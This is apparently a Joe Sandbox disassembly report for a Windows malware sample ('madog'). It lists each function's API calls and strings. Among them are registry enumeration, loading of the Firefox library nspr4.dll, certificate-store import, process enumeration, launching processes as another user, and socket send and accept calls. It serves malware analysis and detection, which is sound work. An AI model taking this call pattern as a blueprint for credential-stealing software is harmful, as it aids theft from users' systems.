Part of subcall function 00414660: CryptHashData.ADVAPI32(00000030,00000010,00418C87,00000000,?,00418C87), ref: 004146AD
Part of subcall function 00414660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00418C87), ref: 004146C5
Part of subcall function 00414660: CryptDestroyHash.ADVAPI32(00000030,?,00418C87), ref: 004146DC
Part of subcall function 00414660: CryptReleaseContext.ADVAPI32(00418C87,00000000,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 004146E6

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040A088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040A12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A159
RegCloseKey.ADVAPI32(?), ref: 0040A28F

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

Part of subcall function 00417595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00419E26,?,?), ref: 004175AD

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040A27C

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040A61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040A6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A6D5
RegCloseKey.ADVAPI32(?), ref: 0040A80C

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

Part of subcall function 00417595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00419E26,?,?), ref: 004175AD

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040A7F9

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041B265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041B28C

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041B2E0

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0041B343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0041B36F

Part of subcall function 0041B3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0041B437
Part of subcall function 0041B3EC: WriteFile.KERNEL32(0041B3D4,?,00000146,?,00000000), ref: 0041B475
Part of subcall function 0041B3EC: WriteFile.KERNEL32(0041B3D4,?,00000000,?,00000000), ref: 0041B499
Part of subcall function 0041B3EC: FlushFileBuffers.KERNEL32(0041B3D4), ref: 0041B4AD
Part of subcall function 0041B3EC: CloseHandle.KERNEL32(0041B3D4), ref: 0041B4B6

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?), ref: 00419874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,004085BE,?,?), ref: 004198C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,004085BE,?,?), ref: 004198D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,004085BE,?,?), ref: 00419909

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00419372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 004186BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 004186D4

Part of subcall function 0041869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 004186B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 004193F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0041940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00419430
FlushFileBuffers.KERNEL32(?), ref: 00419438

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00405B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00405B40

Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DD9
Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DE2

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00405B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00405BD6
TerminateProcess.KERNEL32(?,00000000), ref: 00405BE3

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041CCCF, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 60

APIs

Part of subcall function 004135C6: MultiByteToWideChar.KERNEL32(00412884,00000000,?,00411FF2,?,7718F8FF,00412884,00000000,00000032,?,7718F8FF,00000000), ref: 004135DD

StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,0123F800,00000000), ref: 0041CD57
lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0041CD6F

Strings

C:\Users\admin\AppData\Roaming, xrefs: 0041CD1A, 0041CD56
p.B, xrefs: 0041CD01

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040BB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 00412507: CreateMutexW.KERNEL32(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 0040BB89
SetThreadPriority.KERNEL32(00000000), ref: 0040BB90
WaitForSingleObject.KERNEL32(00001388), ref: 0040BBA8

Part of subcall function 004131CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004131ED
Part of subcall function 004131CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00413216
Part of subcall function 004131CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00413271
Part of subcall function 004131CC: CloseHandle.KERNEL32(00000000), ref: 0041328E
Part of subcall function 004131CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 004132A1
Part of subcall function 004131CC: CloseHandle.KERNEL32(?), ref: 0041330E
Part of subcall function 004131CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0041331A
Part of subcall function 004131CC: CloseHandle.KERNEL32(000001E6), ref: 0041332B

WaitForSingleObject.KERNEL32(00001388), ref: 0040BBBD

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00416B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 00416B4A
DispatchMessageW.USER32(?), ref: 00416B55
PeekMessageW.USER32(00000000), ref: 00416B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00416B79

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00414A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00414A3D
Thread32First.KERNEL32(00000000,?), ref: 00414A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 00414A6E
CloseHandle.KERNEL32(00000000), ref: 00414A79

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041D64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0041D664

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

GetSystemTime.KERNEL32(?), ref: 0041D6B0

Part of subcall function 0041D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041D581,?,?,00000000), ref: 0041D43F

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Strings

.txt, xrefs: 0041D746

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00407EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(004016C0,00000000,00004401,004016D0,?), ref: 00407F29
CoCreateInstance.OLE32(00401690,00000000,00004401,004016A0,?), ref: 00407F7C

Strings

D, xrefs: 00407FA7

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041B4D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0041B4F0

Part of subcall function 0041B265: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041B28C
Part of subcall function 0041B265: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041B2E0
Part of subcall function 0041B265: GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0041B343
Part of subcall function 0041B265: GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0041B36F

Part of subcall function 004133A3: HeapAlloc.KERNEL32(00000000,-00000004,0041B51B), ref: 004133B4

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

p A, xrefs: 0041B554, 0041B56E, 0041B557
nspr4.dll, xrefs: 0041B4EB

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00409C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00409CA8

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

#, xrefs: 00409C8C
&, xrefs: 00409C7E

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040A579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 0040A5C9

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

#, xrefs: 0040A5AD
&, xrefs: 0040A59F

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00412B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 00412B1F
GetProcAddress.KERNEL32(00000000,?), ref: 00412B41

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

0x01D9C0A0, xrefs: 00412B63

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00418737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0041874E

Part of subcall function 004146F4: GetTickCount.KERNEL32(00418766,?), ref: 004146F4

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

Part of subcall function 0041856B: CreateFileW.KERNEL32(00414E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00418585
Part of subcall function 0041856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004185A8
Part of subcall function 0041856B: CloseHandle.KERNEL32(00000000), ref: 004185B5

Strings

%s%08x.%s, xrefs: 0041876C
tmp, xrefs: 00418767

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00416F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00416FB1

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

PathFindFileNameW.SHLWAPI(?), ref: 00416FD3

Part of subcall function 0041353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00414232,00000000,00000000,00000000,00413597,00000000,00000000,00000000,?,00000000), ref: 00413555

Strings

cab, xrefs: 00416FA6

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041C8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 00416AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AC3
Part of subcall function 00416AAA: GetLastError.KERNEL32(?,?,004149F4,?,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 00416AC9
Part of subcall function 00416AAA: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,004149F4,?,?,?,00412326,000000FF,00422C08), ref: 00416AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0041C9FB,00000000,?,?,?), ref: 0041C8C6

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00414CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 00414CEE
Part of subcall function 00414CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00414D0D
Part of subcall function 00414CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00414D19
Part of subcall function 00414CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,0041C8F5,00000000,00000000,00000000,0041C8F5,0041C8F5,00000000,?,?,?,00000000,00000044), ref: 00414D8A
Part of subcall function 00414CDD: CloseHandle.KERNEL32(?), ref: 00414D9D
Part of subcall function 00414CDD: CloseHandle.KERNEL32(?), ref: 00414DA2
Part of subcall function 00414CDD: FreeLibrary.KERNEL32(?), ref: 00414DB9

CloseHandle.KERNEL32(?), ref: 0041C907

Strings

"%s", xrefs: 0041C8DA

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00410397, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41

APIs

getpeername.WS2_32(000000FF,00000000,00000000), ref: 004103BB
getsockname.WS2_32(000000FF,00000000,00000000), ref: 004103CA

Part of subcall function 004163E5: send.WS2_32(00000000,00000000,00000000,00000000), ref: 004163F3

Strings

<M@, xrefs: 00410397

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00415484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 00415403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00415414
Part of subcall function 00415403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00415427
Part of subcall function 00415403: FreeLibrary.KERNEL32(?), ref: 00415479

GetTickCount.KERNEL32(?), ref: 004154C9

Part of subcall function 004152D1: WaitForSingleObject.KERNEL32(?,?), ref: 00415325
Part of subcall function 004152D1: Sleep.KERNEL32(?,?,?,00000000), ref: 00415338
Part of subcall function 004152D1: InternetCloseHandle.WININET(00000000), ref: 004153BE

GetTickCount.KERNEL32(00000000), ref: 004154DB

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

http://www.google.com/webhp, xrefs: 004154A9

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040B971, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B9AE

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

GetCurrentThreadId.KERNEL32 ref: 0040B9A4

Strings

h(B, xrefs: 0040B994

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040BA1B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

GetCurrentThreadId.KERNEL32 ref: 0040BA2D
IsWindow.USER32(?), ref: 0040BA4C

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

Strings

h(B, xrefs: 0040BA5C

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040B9CB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

GetCurrentThreadId.KERNEL32 ref: 0040B9DC
SetLastError.KERNEL32(00000005), ref: 0040BA0B

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

Strings

h(B, xrefs: 0040B9F9

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041672E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18

APIs

Part of subcall function 0041666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 004166EA
Part of subcall function 0041666B: WSASetLastError.WS2_32(0000274C), ref: 004166F9

accept.WS2_32(00000000,00000000,00000001), ref: 00416754

Strings

<M@, xrefs: 0041672E
K2w, xrefs: 00416754

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

